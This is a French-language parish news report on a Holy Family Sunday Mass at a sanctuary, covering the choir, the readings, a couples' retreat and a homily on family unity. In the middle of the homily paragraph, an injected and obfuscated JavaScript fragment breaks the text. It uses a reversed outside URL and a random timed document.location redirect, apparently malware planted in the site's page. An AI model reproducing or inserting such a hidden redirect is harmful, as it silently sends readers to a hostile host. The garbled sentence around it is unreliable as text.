Seulement vingt-quatre heures après la célébration de la solennité da la nativité du Seigneur, nous sommes au dimanche qui suit, et l’Eglise fête la Sainte Famille de Nazareth, composée de Jésus, Marie et Joseph. Le Père Léonce NTAKIRUTIMANA a présidé à la célébration eucharistique de ce jour. La Chorale Sainte Famille tout en bleu ciel, qui d’ailleurs soufflait sa vingt-septième bougie d’apostolat au sanctuaire, a aidé dans l’animations des chants. Les lectures du jour sont respectivement : le Livre d’Isaïe (1, 20-22. 24-28), la première épitre de saint Jean (3, 1-2. 21-24) et l’Evangile selon saint Luc (2, 41-52).

Dans une brève allocution du début de la Messe, le Père Recteur du sanctuaire a souhaité joyeux Noël et bonne fête de la Sainte Famille à tous les pèlerins en général, et en particulier aux familles qui venaient de terminer une mini retraite de quatre jours du 20 au 23 courant. Ces familles étaient en deux catégories : les couples qui fêtaient vingt-cinq ans de mariage et ceux qui avaient entre un mois et deux ans de mariage. Les uns comme les autres ont eu l’occasion de se rappeler leur apostolat et leur mission en tant que membres d’une grande famille qu’est l’Eglise universelle. Une autre attention particulière a été porté aux familles qui s’étaient préparées à accueillir le sanctuaire dans leurs foyers et qui allaient solennellement recevoir cet apostolat au cours de cette célébration eucharistique. Le Père Recteur a affirmé qu’il est à constater que leur apostolat porte de plus en plus de fruit. Il a enfin souligné que ce jour est une occasion pour tout un chacun de présenter devant Dieu toutes les familles en situation de difficultés diverses, qui malheureusement deviennent de plus en plus nombreuses actuellement.

Dans son homélie, le Père Léonce s’est posé la question de savoir si tout le monde comprenait comment un enfant qui est né hier a déjà toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze ans en ce jour où l’Eglise célèbre la Sainte Famille de Nazareth avec l’Evangile qui nous parle du pèlerinage que Jésus et ses parents avaient fait à Jérusalem et Jésus qui est resté sur les lieux alors que ses parents rentraient à la maison. Ses parents ont fait trois jours à le rechercher alors qu’il était assis parmi les intellectuels de son temps en les écoutant et en les interrogeant. ‘ Ce qui compte pour nous aujourd’hui ce n’est pas le fait de compter le nombre de jours et d’années mais la contemplation du mystère de notre salut’, a précisé le Père prédicateur du jour. Nous nous réjouissons car nous sommes nés dans une famille, comptant peu ou nombreux membres au sein d’elle et ayant plus ou moins de difficultés. Ce qui nous réconforte de plus c’est que nous sommes tous membres d’une seule famille avec un seul Père qui est le Dieu de l’univers. Nul n’a choisi de naître dans telle ou telle autre famille ou dans telle ou telle autre région, nous nous sommes retrouvés membres d’une seule famille. Selon le Père Léonce, trois choses importent le plus pour faire de nos familles à l’exemple de celle de Jésus, Marie et Joseph. D’abord, il est bon de faire un pèlerinage dans un lieu de choix pour demander des grâces à Dieu. La vieille Anna l’a fait au Temple de Jérusalem, la sainte Famille de même. Pensons à notre tour d’en faire au moins un vers un lieu selon nos moyens. Ensuite, prenons exemple de l’amour et l’unité qui a caractérisé la Sainte Famille, en particulier les parents de Jésus qui sont restés unis et ensemble à la recherche du jeune Jésus perdu. Ceci nous rappelle à tenir nos engagements de mariage de nous soutenir l’un l’autre dans les bons moments comme dans les dures épreuves. Enfin, les enfants ont été interpelés à obéir à leurs frères et sœurs tout comme à leurs parents. Selon le Père Léonce, pour mieux accomplir nos tâches quotidiennes, nous devrions changer nos noms pour prendre ceux des membres de la Sainte Famille : les papas prendraient le nom de Joseph, les mamans changeraient en Marie et les enfants en Jésus. Ainsi nos familles seraient unies comme la Sainte Famille de Nazareth.

Signalons qu’à la fin de la messe comme à l’accoutumée chaque dernier dimanche du mois, il y a eu procession vers le sanctuaire et où les couples qui ont passé quatre jours de retraite ont eu des « certificats ».

NYANDWI M.